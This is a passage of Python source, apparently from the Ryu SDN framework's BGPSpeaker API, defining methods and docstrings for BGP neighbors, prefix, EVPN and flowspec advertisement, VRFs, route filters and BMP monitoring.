best_path_change_handler=None,
peer_down_handler=None,
peer_up_handler=None,
ssh_console=False,
ssh_port=None, ssh_host=None, ssh_host_key=None,
label_range=DEFAULT_LABEL_RANGE,
allow_local_as_in_count=0,
cluster_id=None,
local_pref=DEFAULT_LOCAL_PREF):
"""Create a new BGPSpeaker object with as_number and router_id to
listen on bgp_server_port.
``as_number`` specifies an Autonomous Number. It must be an integer
between 1 and 65535.
``router_id`` specifies BGP router identifier. It must be the
string representation of an IPv4 address (e.g. 10.0.0.1).
``bgp_server_host`` specifies a list of TCP listen host addresses.
``bgp_server_port`` specifies TCP listen port number. 179 is
used if not specified.
``refresh_stalepath_time`` causes the BGP speaker to remove
stale routes from the BGP table after the timer expires, even
if the speaker does not receive a Router-Refresh End-of-RIB
message. This feature is disabled (not implemented yet).
``refresh_max_eor_time`` causes the BGP speaker to generate a
Route-Refresh End-of-RIB message if it was not able to
generate one due to route flapping. This feature is disabled
(not implemented yet).
``best_path_change_handler``, if specified, is called when any
best remote path is changed due to an update message or remote
peer down. The handler is supposed to take one argument, the
instance of an EventPrefix class instance.
``peer_down_handler``, if specified, is called when BGP peering
session goes down.
``peer_up_handler``, if specified, is called when BGP peering
session goes up.
``ssh_console`` specifies whether or not SSH CLI need to be started.
``ssh_port`` specifies the port number for SSH CLI server.
The default is bgp.operator.ssh.DEFAULT_SSH_PORT.
``ssh_host`` specifies the IP address for SSH CLI server.
The default is bgp.operator.ssh.DEFAULT_SSH_HOST.
``ssh_host_key`` specifies the path to the host key added to
the keys list used by SSH CLI server.
The default is bgp.operator.ssh.DEFAULT_SSH_HOST_KEY.
``label_range`` specifies the range of MPLS labels generated
automatically.
``allow_local_as_in_count`` maximum number of local AS number
occurrences in AS_PATH. This option is useful for e.g. auto RD/RT
configurations in leaf/spine architecture with shared AS numbers.
The default is 0 and means "local AS number is not allowed in
AS_PATH". To allow local AS, 3 is recommended (Cisco's default).
``cluster_id`` specifies the cluster identifier for Route Reflector.
It must be the string representation of an IPv4 address.
If omitted, "router_id" is used for this field.
``local_pref`` specifies the default local preference. It must be an
integer.
"""
super(BGPSpeaker, self).__init__()
settings = {
LOCAL_AS: as_number,
ROUTER_ID: router_id,
BGP_SERVER_HOSTS: bgp_server_hosts,
BGP_SERVER_PORT: bgp_server_port,
REFRESH_STALEPATH_TIME: refresh_stalepath_time,
REFRESH_MAX_EOR_TIME: refresh_max_eor_time,
LABEL_RANGE: label_range,
ALLOW_LOCAL_AS_IN_COUNT: allow_local_as_in_count,
CLUSTER_ID: cluster_id,
LOCAL_PREF: local_pref,
}
self._core_start(settings)
self._init_signal_listeners()
self._best_path_change_handler = best_path_change_handler
self._peer_down_handler = peer_down_handler
self._peer_up_handler = peer_up_handler
if ssh_console:
# Note: paramiko used in bgp.operator.ssh is the optional
# requirements, imports bgp.operator.ssh here.
from ryu.services.protocols.bgp.operator import ssh
ssh_settings = {
ssh.SSH_PORT: ssh_port or ssh.DEFAULT_SSH_PORT,
ssh.SSH_HOST: ssh_host or ssh.DEFAULT_SSH_HOST,
ssh.SSH_HOST_KEY: ssh_host_key or ssh.DEFAULT_SSH_HOST_KEY,
}
hub.spawn(ssh.SSH_CLI_CONTROLLER.start, **ssh_settings)
def _notify_peer_down(self, peer):
remote_ip = peer.ip_address
remote_as = peer.remote_as
if self._peer_down_handler:
self._peer_down_handler(remote_ip, remote_as)
def _notify_peer_up(self, peer):
remote_ip = peer.ip_address
remote_as = peer.remote_as
if self._peer_up_handler:
self._peer_up_handler(remote_ip, remote_as)
def _notify_best_path_changed(self, path, is_withdraw):
if (not path.source
or not isinstance(path, (Ipv4Path, Ipv6Path,
Vpnv4Path, Vpnv6Path, EvpnPath))):
return
ev = EventPrefix(path, is_withdraw)
if self._best_path_change_handler:
self._best_path_change_handler(ev)
def _init_signal_listeners(self):
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_BEST_PATH_CHANGED,
lambda _, info:
self._notify_best_path_changed(info['path'],
info['is_withdraw'])
)
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_ADJ_DOWN,
lambda _, info:
self._notify_peer_down(info['peer'])
)
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_ADJ_UP,
lambda _, info:
self._notify_peer_up(info['peer'])
)
def _core_start(self, settings):
waiter = hub.Event()
call('core.start', waiter=waiter, **settings)
waiter.wait()
def _serve_forever(self):
pass
def shutdown(self):
""" Shutdown BGP speaker
"""
call('core.stop')
def neighbor_add(self, address, remote_as,
enable_ipv4=DEFAULT_CAP_MBGP_IPV4,
enable_ipv6=DEFAULT_CAP_MBGP_IPV6,
enable_vpnv4=DEFAULT_CAP_MBGP_VPNV4,
enable_vpnv6=DEFAULT_CAP_MBGP_VPNV6,
enable_evpn=DEFAULT_CAP_MBGP_EVPN,
enable_ipv4fs=DEFAULT_CAP_MBGP_IPV4FS,
enable_ipv6fs=DEFAULT_CAP_MBGP_IPV6FS,
enable_vpnv4fs=DEFAULT_CAP_MBGP_VPNV4FS,
enable_vpnv6fs=DEFAULT_CAP_MBGP_VPNV6FS,
enable_l2vpnfs=DEFAULT_CAP_MBGP_L2VPNFS,
enable_enhanced_refresh=DEFAULT_CAP_ENHANCED_REFRESH,
enable_four_octet_as_number=DEFAULT_CAP_FOUR_OCTET_AS_NUMBER,
next_hop=None, password=None, multi_exit_disc=None,
site_of_origins=None,
is_route_server_client=DEFAULT_IS_ROUTE_SERVER_CLIENT,
is_route_reflector_client=DEFAULT_IS_ROUTE_REFLECTOR_CLIENT,
is_next_hop_self=DEFAULT_IS_NEXT_HOP_SELF,
local_address=None,
local_port=None, local_as=None,
connect_mode=DEFAULT_CONNECT_MODE,
hold_time=DEFAULT_HOLD_TIME):
""" This method registers a new neighbor. The BGP speaker tries to
establish a bgp session with the peer (accepts a connection
from the peer and also tries to connect to it).
``address`` specifies the IP address of the peer. It must be
the string representation of an IP address. Only IPv4 is
supported now.
``remote_as`` specifies the AS number of the peer. It must be
an integer between 1 and 65535.
``enable_ipv4`` enables IPv4 address family for this
neighbor.
``enable_ipv6`` enables IPv6 address family for this
neighbor.
``enable_vpnv4`` enables VPNv4 address family for this
neighbor.
``enable_vpnv6`` enables VPNv6 address family for this
neighbor.
``enable_evpn`` enables Ethernet VPN address family for this
neighbor.
``enable_ipv4fs`` enables IPv4 Flow Specification address family
for this neighbor.
``enable_ipv6fs`` enables IPv6 Flow Specification address family
for this neighbor.
``enable_vpnv4fs`` enables VPNv4 Flow Specification address family
for this neighbor.
``enable_vpnv6fs`` enables VPNv6 Flow Specification address family
for this neighbor.
``enable_l2vpnfs`` enables L2VPN Flow Specification address family
for this neighbor.
``enable_enhanced_refresh`` enables Enhanced Route Refresh for this
neighbor.
``enable_four_octet_as_number`` enables Four-Octet AS Number
capability for this neighbor.
``next_hop`` specifies the next hop IP address. If not
specified, host's ip address to access to a peer is used.
``password`` is used for the MD5 authentication if it's
specified. By default, the MD5 authentication is disabled.
``multi_exit_disc`` specifies multi exit discriminator (MED) value
as an int type value.
If omitted, MED is not sent to the neighbor.
``site_of_origins`` specifies site_of_origin values.
This parameter must be a list of string.
``is_route_server_client`` specifies whether this neighbor is a
router server's client or not.
``is_route_reflector_client`` specifies whether this neighbor is a
router reflector's client or not.
``is_next_hop_self`` specifies whether the BGP speaker announces
its own ip address to iBGP neighbor or not as path's next_hop address.
``local_address`` specifies Loopback interface address for
iBGP peering.
``local_port`` specifies source TCP port for iBGP peering.
``local_as`` specifies local AS number per-peer.
If omitted, the AS number of BGPSpeaker instance is used.
``connect_mode`` specifies how to connect to this neighbor.
This parameter must be one of the following.
- CONNECT_MODE_ACTIVE = 'active'
- CONNECT_MODE_PASSIVE = 'passive'
- CONNECT_MODE_BOTH (default) = 'both'
``hold_time`` specifies the time after which a peer is considered
down if no update or keepalive has been received.
"""
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
neighbors.REMOTE_AS: remote_as,
PEER_NEXT_HOP: next_hop,
PASSWORD: password,
IS_ROUTE_SERVER_CLIENT: is_route_server_client,
IS_ROUTE_REFLECTOR_CLIENT: is_route_reflector_client,
IS_NEXT_HOP_SELF: is_next_hop_self,
CONNECT_MODE: connect_mode,
CAP_ENHANCED_REFRESH: enable_enhanced_refresh,
CAP_FOUR_OCTET_AS_NUMBER: enable_four_octet_as_number,
CAP_MBGP_IPV4: enable_ipv4,
CAP_MBGP_IPV6: enable_ipv6,
CAP_MBGP_VPNV4: enable_vpnv4,
CAP_MBGP_VPNV6: enable_vpnv6,
CAP_MBGP_EVPN: enable_evpn,
CAP_MBGP_IPV4FS: enable_ipv4fs,
CAP_MBGP_IPV6FS: enable_ipv6fs,
CAP_MBGP_VPNV4FS: enable_vpnv4fs,
CAP_MBGP_VPNV6FS: enable_vpnv6fs,
CAP_MBGP_L2VPNFS: enable_l2vpnfs,
HOLD_TIME: hold_time,
}
if multi_exit_disc:
bgp_neighbor[MULTI_EXIT_DISC] = multi_exit_disc
if site_of_origins:
bgp_neighbor[SITE_OF_ORIGINS] = site_of_origins
if local_address:
bgp_neighbor[LOCAL_ADDRESS] = local_address
if local_port:
bgp_neighbor[LOCAL_PORT] = local_port
if local_as:
bgp_neighbor[LOCAL_AS] = local_as
call('neighbor.create', **bgp_neighbor)
def neighbor_del(self, address):
""" This method unregister the registered neighbor. If a session with
the peer exists, the session will be closed.
``address`` specifies the IP address of the peer. It must be
the string representation of an IP address.
"""
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
}
call('neighbor.delete', **bgp_neighbor)
def neighbor_reset(self, address):
""" This method reset the registered neighbor.
``address`` specifies the IP address of the peer. It must be
the string representation of an IP address.
"""
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
}
call('core.reset_neighbor', **bgp_neighbor)
def neighbor_update(self, address, conf_type, conf_value):
""" This method changes the neighbor configuration.
``address`` specifies the IP address of the peer.
``conf_type`` specifies configuration type which you want to change.
Currently ryu.services.protocols.bgp.bgpspeaker.MULTI_EXIT_DISC
can be specified.
``conf_value`` specifies value for the configuration type.
"""
assert conf_type == MULTI_EXIT_DISC or conf_type == CONNECT_MODE
func_name = 'neighbor.update'
attribute_param = {}
if conf_type == MULTI_EXIT_DISC:
attribute_param = {neighbors.MULTI_EXIT_DISC: conf_value}
elif conf_type == CONNECT_MODE:
attribute_param = {neighbors.CONNECT_MODE: conf_value}
param = {neighbors.IP_ADDRESS: address,
neighbors.CHANGES: attribute_param}
call(func_name, **param)
def neighbor_state_get(self, address=None, format='json'):
""" This method returns the state of peer(s) in a json
format.
``address`` specifies the address of a peer. If not given, the
state of all the peers return.
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'params': ['neighbor', 'summary'],
'format': format,
}
if address:
show['params'].append(address)
return call('operator.show', **show)
def prefix_add(self, prefix, next_hop=None, route_dist=None):
""" This method adds a new prefix to be advertised.
``prefix`` must be the string representation of an IP network
(e.g., 10.1.1.0/24).
``next_hop`` specifies the next hop address for this
prefix. This parameter is necessary for only VPNv4 and VPNv6
address families.
``route_dist`` specifies a route distinguisher value. This
parameter is necessary for only VPNv4 and VPNv6 address
families.
"""
func_name = 'network.add'
networks = {
PREFIX: prefix,
}
if next_hop:
networks[NEXT_HOP] = next_hop
if route_dist:
func_name = 'prefix.add_local'
networks[ROUTE_DISTINGUISHER] = route_dist
rf, p = self._check_rf_and_normalize(prefix)
networks[ROUTE_FAMILY] = rf
networks[PREFIX] = p
if rf == vrfs.VRF_RF_IPV6 and netaddr.valid_ipv4(next_hop):
# convert the next_hop to IPv4-Mapped IPv6 Address
networks[NEXT_HOP] = \
str(netaddr.IPAddress(next_hop).ipv6())
return call(func_name, **networks)
def prefix_del(self, prefix, route_dist=None):
""" This method deletes a advertised prefix.
``prefix`` must be the string representation of an IP network.
``route_dist`` specifies a route distinguisher value.
"""
func_name = 'network.del'
networks = {
PREFIX: prefix,
}
if route_dist:
func_name = 'prefix.delete_local'
networks[ROUTE_DISTINGUISHER] = route_dist
rf, p = self._check_rf_and_normalize(prefix)
networks[ROUTE_FAMILY] = rf
networks[PREFIX] = p
call(func_name, **networks)
def evpn_prefix_add(self, route_type, route_dist, esi=0,
ethernet_tag_id=None, mac_addr=None, ip_addr=None,
ip_prefix=None, gw_ip_addr=None, vni=None,
next_hop=None, tunnel_type=None, pmsi_tunnel_type=None,
redundancy_mode=None):
""" This method adds a new EVPN route to be advertised.
``route_type`` specifies one of the EVPN route type name.
This parameter must be one of the following.
- EVPN_ETH_AUTO_DISCOVERY = 'eth_ad'
- EVPN_MAC_IP_ADV_ROUTE = 'mac_ip_adv'
- EVPN_MULTICAST_ETAG_ROUTE = 'multicast_etag'
- EVPN_ETH_SEGMENT = 'eth_seg'
- EVPN_IP_PREFIX_ROUTE = 'ip_prefix'
``route_dist`` specifies a route distinguisher value.
``esi`` is an value to specify the Ethernet Segment Identifier.
0 is the default and denotes a single-homed site.
If you want to advertise esi other than 0,
it must be set as dictionary type.
If esi is dictionary type, 'type' key must be set
and specifies ESI type.
For the supported ESI type, see :py:mod:`ryu.lib.packet.bgp.EvpnEsi`.
The remaining arguments are the same as that for
the corresponding class.
``ethernet_tag_id`` specifies the Ethernet Tag ID.
``mac_addr`` specifies a MAC address to advertise.
``ip_addr`` specifies an IPv4 or IPv6 address to advertise.
``ip_prefix`` specifies an IPv4 or IPv6 prefix to advertise.
``gw_ip_addr`` specifies an IPv4 or IPv6 address of
gateway to advertise.
``vni`` specifies an Virtual Network Identifier for VXLAN
or Virtual Subnet Identifier for NVGRE.
If tunnel_type is not TUNNEL_TYPE_VXLAN or TUNNEL_TYPE_NVGRE,
this field is ignored.
``next_hop`` specifies the next hop address for this prefix.
``tunnel_type`` specifies the data plane encapsulation type
to advertise. By the default, this attribute is not advertised.
The supported encapsulation types are following.
- TUNNEL_TYPE_VXLAN = 'vxlan'
- TUNNEL_TYPE_NVGRE = 'nvgre
``pmsi_tunnel_type`` specifies the type of the PMSI tunnel attribute
used to encode the multicast tunnel identifier.
This attribute is advertised only if route_type is
EVPN_MULTICAST_ETAG_ROUTE and not advertised by the default.
This attribute can also carry vni if tunnel_type is specified.
The supported PMSI tunnel types are following.
- PMSI_TYPE_NO_TUNNEL_INFO = 0
- PMSI_TYPE_INGRESS_REP = 6
``redundancy_mode`` specifies a redundancy mode type.
This attribute is advertised only if route_type is
EVPN_ETH_AUTO_DISCOVERY and not advertised by the default.
The supported redundancy mode types are following.
- REDUNDANCY_MODE_ALL_ACTIVE = 'all_active'
- REDUNDANCY_MODE_SINGLE_ACTIVE = 'single_active'
"""
func_name = 'evpn_prefix.add_local'
# Check the default values
if not next_hop:
next_hop = '0.0.0.0'
# Set required arguments
kwargs = {EVPN_ROUTE_TYPE: route_type,
ROUTE_DISTINGUISHER: route_dist,
NEXT_HOP: next_hop}
# Set optional arguments
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[TUNNEL_TYPE] = tunnel_type
elif tunnel_type is not None:
raise ValueError('Unsupported tunnel type: %s' % tunnel_type)
# Set route type specific arguments
if route_type == EVPN_ETH_AUTO_DISCOVERY:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
})
if vni is not None:
kwargs[EVPN_VNI] = vni
# Set Redundancy Mode Attribute arguments
if redundancy_mode in [
REDUNDANCY_MODE_ALL_ACTIVE,
REDUNDANCY_MODE_SINGLE_ACTIVE]:
kwargs[REDUNDANCY_MODE] = redundancy_mode
elif redundancy_mode is not None:
raise ValueError('Unsupported Redundancy Mode: %s' %
redundancy_mode)
elif route_type == EVPN_MAC_IP_ADV_ROUTE:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
MAC_ADDR: mac_addr,
IP_ADDR: ip_addr,
})
# Set tunnel type specific arguments
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
elif route_type == EVPN_MULTICAST_ETAG_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_ADDR: ip_addr,
})
# Set tunnel type specific arguments
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
# Set PMSI Tunnel Attribute arguments
if pmsi_tunnel_type in [
PMSI_TYPE_NO_TUNNEL_INFO,
PMSI_TYPE_INGRESS_REP]:
kwargs[PMSI_TUNNEL_TYPE] = pmsi_tunnel_type
elif pmsi_tunnel_type is not None:
raise ValueError('Unsupported PMSI tunnel type: %s' %
pmsi_tunnel_type)
elif route_type == EVPN_ETH_SEGMENT:
kwargs.update({
EVPN_ESI: esi,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_IP_PREFIX_ROUTE:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_PREFIX: ip_prefix,
GW_IP_ADDR: gw_ip_addr,
})
# Set tunnel type specific arguments
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
else:
raise ValueError('Unsupported EVPN route type: %s' % route_type)
call(func_name, **kwargs)
def evpn_prefix_del(self, route_type, route_dist, esi=0,
ethernet_tag_id=None, mac_addr=None, ip_addr=None,
ip_prefix=None):
""" This method deletes an advertised EVPN route.
``route_type`` specifies one of the EVPN route type name.
``route_dist`` specifies a route distinguisher value.
``esi`` is an value to specify the Ethernet Segment Identifier.
``ethernet_tag_id`` specifies the Ethernet Tag ID.
``mac_addr`` specifies a MAC address to advertise.
``ip_addr`` specifies an IPv4 or IPv6 address to advertise.
``ip_prefix`` specifies an IPv4 or IPv6 prefix to advertise.
"""
func_name = 'evpn_prefix.delete_local'
# Set required arguments
kwargs = {EVPN_ROUTE_TYPE: route_type,
ROUTE_DISTINGUISHER: route_dist}
# Set route type specific arguments
if route_type == EVPN_ETH_AUTO_DISCOVERY:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
})
elif route_type == EVPN_MAC_IP_ADV_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
MAC_ADDR: mac_addr,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_MULTICAST_ETAG_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_ETH_SEGMENT:
kwargs.update({
EVPN_ESI: esi,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_IP_PREFIX_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_PREFIX: ip_prefix,
})
else:
raise ValueError('Unsupported EVPN route type: %s' % route_type)
call(func_name, **kwargs)
def flowspec_prefix_add(self, flowspec_family, rules, route_dist=None,
actions=None):
""" This method adds a new Flow Specification prefix to be advertised.
``flowspec_family`` specifies one of the flowspec family name.
This parameter must be one of the following.
- FLOWSPEC_FAMILY_IPV4 = 'ipv4fs'
- FLOWSPEC_FAMILY_IPV6 = 'ipv6fs'
- FLOWSPEC_FAMILY_VPNV4 = 'vpnv4fs'
- FLOWSPEC_FAMILY_VPNV6 = 'vpnv6fs'
- FLOWSPEC_FAMILY_L2VPN = 'l2vpnfs'
``rules`` specifies NLRIs of Flow Specification as
a dictionary type value.
For the supported NLRI types and arguments,
see `from_user()` method of the following classes.
- :py:mod:`ryu.lib.packet.bgp.FlowSpecIPv4NLRI`
- :py:mod:`ryu.lib.packet.bgp.FlowSpecIPv6NLRI`
- :py:mod:`ryu.lib.packet.bgp.FlowSpecVPNv4NLRI`
- :py:mod:`ryu.lib.packet.bgp.FlowSpecVPNv6NLRI`
- :py:mod:`ryu.lib.packet.bgp.FlowSpecL2VPNNLRI`
``route_dist`` specifies a route distinguisher value.
This parameter is required only if flowspec_family is one of the
following address family.
- FLOWSPEC_FAMILY_VPNV4 = 'vpnv4fs'
- FLOWSPEC_FAMILY_VPNV6 = 'vpnv6fs'
- FLOWSPEC_FAMILY_L2VPN = 'l2vpnfs'
``actions`` specifies Traffic Filtering Actions of
Flow Specification as a dictionary type value.
The keys are "ACTION_NAME" for each action class and
values are used for the arguments to that class.
For the supported "ACTION_NAME" and arguments,
see the following table.
=============== ===============================================================
ACTION_NAME Action Class
=============== ===============================================================
traffic_rate :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecTrafficRateCommunity`
traffic_action :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecTrafficActionCommunity`
redirect :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecRedirectCommunity`
traffic_marking :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecTrafficMarkingCommunity`
vlan_action :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecVlanActionCommunity`
tpid_action :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecTPIDActionCommunity`
=============== ===============================================================
Example(IPv4)::
>>> speaker = BGPSpeaker(as_number=65001, router_id='172.17.0.1')
>>> speaker.neighbor_add(address='172.17.0.2',
... remote_as=65002,
... enable_ipv4fs=True)
>>> speaker.flowspec_prefix_add(
... flowspec_family=FLOWSPEC_FAMILY_IPV4,
... rules={
... 'dst_prefix': '10.60.1.0/24'
... },
... actions={
... 'traffic_marking': {
... 'dscp': 24
... }
... }
... )
Example(VPNv4)::
>>> speaker = BGPSpeaker(as_number=65001, router_id='172.17.0.1')
>>> speaker.neighbor_add(address='172.17.0.2',
... remote_as=65002,
... enable_vpnv4fs=True)
>>> speaker.vrf_add(route_dist='65001:100',
... import_rts=['65001:100'],
... export_rts=['65001:100'],
... route_family=RF_VPNV4_FLOWSPEC)
>>> speaker.flowspec_prefix_add(
... flowspec_family=FLOWSPEC_FAMILY_VPNV4,
... route_dist='65000:100',
... rules={
... 'dst_prefix': '10.60.1.0/24'
... },
... actions={
... 'traffic_marking': {
... 'dscp': 24
... }
... }
... )
"""
func_name = 'flowspec.add'
# Set required arguments
kwargs = {
FLOWSPEC_FAMILY: flowspec_family,
FLOWSPEC_RULES: rules,
FLOWSPEC_ACTIONS: actions or {},
}
if flowspec_family in [FLOWSPEC_FAMILY_VPNV4, FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN]:
func_name = 'flowspec.add_local'
kwargs.update({ROUTE_DISTINGUISHER: route_dist})
call(func_name, **kwargs)
def flowspec_prefix_del(self, flowspec_family, rules, route_dist=None):
""" This method deletes an advertised Flow Specification route.
``flowspec_family`` specifies one of the flowspec family name.
``rules`` specifies NLRIs of Flow Specification as
a dictionary type value.
``route_dist`` specifies a route distinguisher value.
"""
func_name = 'flowspec.del'
# Set required arguments
kwargs = {
FLOWSPEC_FAMILY: flowspec_family,
FLOWSPEC_RULES: rules,
}
if flowspec_family in [FLOWSPEC_FAMILY_VPNV4, FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN]:
func_name = 'flowspec.del_local'
kwargs.update({ROUTE_DISTINGUISHER: route_dist})
call(func_name, **kwargs)
def vrf_add(self, route_dist, import_rts, export_rts, site_of_origins=None,
route_family=RF_VPN_V4, multi_exit_disc=None):
""" This method adds a new vrf used for VPN.
``route_dist`` specifies a route distinguisher value.
``import_rts`` specifies a list of route targets to be imported.
``export_rts`` specifies a list of route targets to be exported.
``site_of_origins`` specifies site_of_origin values.
This parameter must be a list of string.
``route_family`` specifies route family of the VRF.
This parameter must be one of the following.
- RF_VPN_V4 (default) = 'ipv4'
- RF_VPN_V6 = 'ipv6'
- RF_L2_EVPN = 'evpn'
- RF_VPNV4_FLOWSPEC = 'ipv4fs'
- RF_VPNV6_FLOWSPEC = 'ipv6fs'
- RF_L2VPN_FLOWSPEC = 'l2vpnfs'
``multi_exit_disc`` specifies multi exit discriminator (MED) value.
It must be an integer.
"""
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
vrf = {
vrfs.ROUTE_DISTINGUISHER: route_dist,
vrfs.IMPORT_RTS: import_rts,
vrfs.EXPORT_RTS: export_rts,
vrfs.SITE_OF_ORIGINS: site_of_origins,
vrfs.VRF_RF: route_family,
vrfs.MULTI_EXIT_DISC: multi_exit_disc,
}
call('vrf.create', **vrf)
def vrf_del(self, route_dist):
""" This method deletes the existing vrf.
``route_dist`` specifies a route distinguisher value.
"""
vrf = {vrfs.ROUTE_DISTINGUISHER: route_dist}
call('vrf.delete', **vrf)
def vrfs_get(self, subcommand='routes', route_dist=None,
route_family='all', format='json'):
""" This method returns the existing vrfs.
``subcommand`` specifies one of the following.
- 'routes': shows routes present for vrf
- 'summary': shows configuration and summary of vrf
``route_dist`` specifies a route distinguisher value.
If route_family is not 'all', this value must be specified.
``route_family`` specifies route family of the VRF.
This parameter must be one of the following.
- RF_VPN_V4 = 'ipv4'
- RF_VPN_V6 = 'ipv6'
- RF_L2_EVPN = 'evpn'
- 'all' (default)
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'format': format,
}
if route_family in SUPPORTED_VRF_RF:
assert route_dist is not None
show['params'] = ['vrf', subcommand, route_dist, route_family]
else:
show['params'] = ['vrf', subcommand, 'all']
return call('operator.show', **show)
def rib_get(self, family='all', format='json'):
""" This method returns the BGP routing information in a json
format. This will be improved soon.
``family`` specifies the address family of the RIB (e.g. 'ipv4').
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'params': ['rib', family],
'format': format
}
return call('operator.show', **show)
def neighbor_get(self, route_type, address, format='json'):
""" This method returns the BGP adj-RIB-in/adj-RIB-out information
in a json format.
``route_type`` This parameter is necessary for only received-routes
and sent-routes.
- received-routes : paths received and not withdrawn by given peer
- sent-routes : paths sent and not withdrawn to given peer
``address`` specifies the IP address of the peer. It must be
the string representation of an IP address.
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'format': format,
}
if route_type == 'sent-routes' or route_type == 'received-routes':
show['params'] = ['neighbor', route_type, address, 'all']
else:
show['params'] = ['neighbor', 'received-routes', address, 'all']
return call('operator.show', **show)
def neighbors_get(self, format='json'):
""" This method returns a list of the BGP neighbors.
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'params': ['neighbor'],
'format': format,
}
return call('operator.show', **show)
def _set_filter(self, filter_type, address, filters):
assert filter_type in ('in', 'out'), (
"filter type must be 'in' or 'out'")
assert all(isinstance(f, Filter) for f in filters), (
'all the items in filters must be an instance of Filter sub-class')
if filters is None:
filters = []
func_name = 'neighbor.' + filter_type + '_filter.set'
param = {
neighbors.IP_ADDRESS: address,
}
if filter_type == 'in':
param[neighbors.IN_FILTER] = filters
else:
param[neighbors.OUT_FILTER] = filters
call(func_name, **param)
def out_filter_set(self, address, filters):
""" This method sets out-filter to neighbor.
``address`` specifies the IP address of the peer.
``filters`` specifies a filter list to filter the path advertisement.
The contents must be an instance of Filter sub-class
If you want to define out-filter that send only a particular
prefix to neighbor, filters can be created as follows::
p = PrefixFilter('10.5.111.0/24',
policy=PrefixFilter.POLICY_PERMIT)
all = PrefixFilter('0.0.0.0/0',
policy=PrefixFilter.POLICY_DENY)
pList = [p, all]
self.bgpspeaker.out_filter_set(neighbor_address, pList)
.. Note::
out-filter evaluates paths in the order of Filter in the pList.
"""
self._set_filter('out', address, filters)
def out_filter_get(self, address):
""" This method gets out-filter setting from the specified neighbor.
``address`` specifies the IP address of the peer.
Returns a list object containing an instance of Filter sub-class
"""
func_name = 'neighbor.out_filter.get'
param = {
neighbors.IP_ADDRESS: address,
}
return call(func_name, **param)
def in_filter_set(self, address, filters):
"""This method sets in-bound filters to a neighbor.
``address`` specifies the IP address of the neighbor
``filters`` specifies filter list applied before advertised paths are
imported to the global rib. All the items in the list must be an
instance of Filter sub-class.
"""
self._set_filter('in', address, filters)
def in_filter_get(self, address):
"""This method gets in-bound filters of the specified neighbor.
``address`` specifies the IP address of the neighbor.
Returns a list object containing an instance of Filter sub-class
"""
func_name = 'neighbor.in_filter.get'
param = {
neighbors.IP_ADDRESS: address,
}
return call(func_name, **param)
def bmp_server_add(self, address, port):
"""This method registers a new BMP (BGP monitoring Protocol)
server. The BGP speaker starts to send BMP messages to the
server. Currently, only one BMP server can be registered.
``address`` specifies the IP address of a BMP server.
``port`` specifies the listen port number of a BMP server.
"""
func_name = 'bmp.start'
param = {
'host': address,
'port': port,
}
call(func_name, **param)
def bmp_server_del(self, address, port):
""" This method unregister the registered BMP server.
``address`` specifies the IP address of a BMP server.
``port`` specifies the listen port number of a BMP server.
"""
func_name = 'bmp.stop'
param = {
'host': address,
'port': port,
}
call(func_name, **param)
def attribute_map_set(self, address, attribute_maps,
route_dist=None, route_family=RF_VPN_V4):
"""This method sets attribute mapping to a neighbor.
attribute mapping can be used when you want to apply
attribute to BGPUpdate under specific conditions.
``address`` specifies the IP address of the neighbor
``attribute_maps`` specifies attribute_map list that are used
before paths are advertised. All the items in the list must
be an instance of AttributeMap class
``route_dist`` specifies route dist in which attribute_maps
are added.
``route_family`` specifies route family of the VRF.
This parameter must be one of the following.
- RF_VPN_V4 (default) = 'ipv4'
- RF_VPN_V6 = 'ipv6'
We can set AttributeMap to a neighbor as follows::
pref_filter = PrefixFilter('192.168.103.0/30',
PrefixFilter.POLICY_PERMIT)
attribute_map = AttributeMap([pref_filter],
AttributeMap.ATTR_LOCAL_PREF, 250)
speaker.attribute_map_set('192.168.50.102', [attribute_map])
"""
if route_family not in SUPPORTED_VRF_RF:
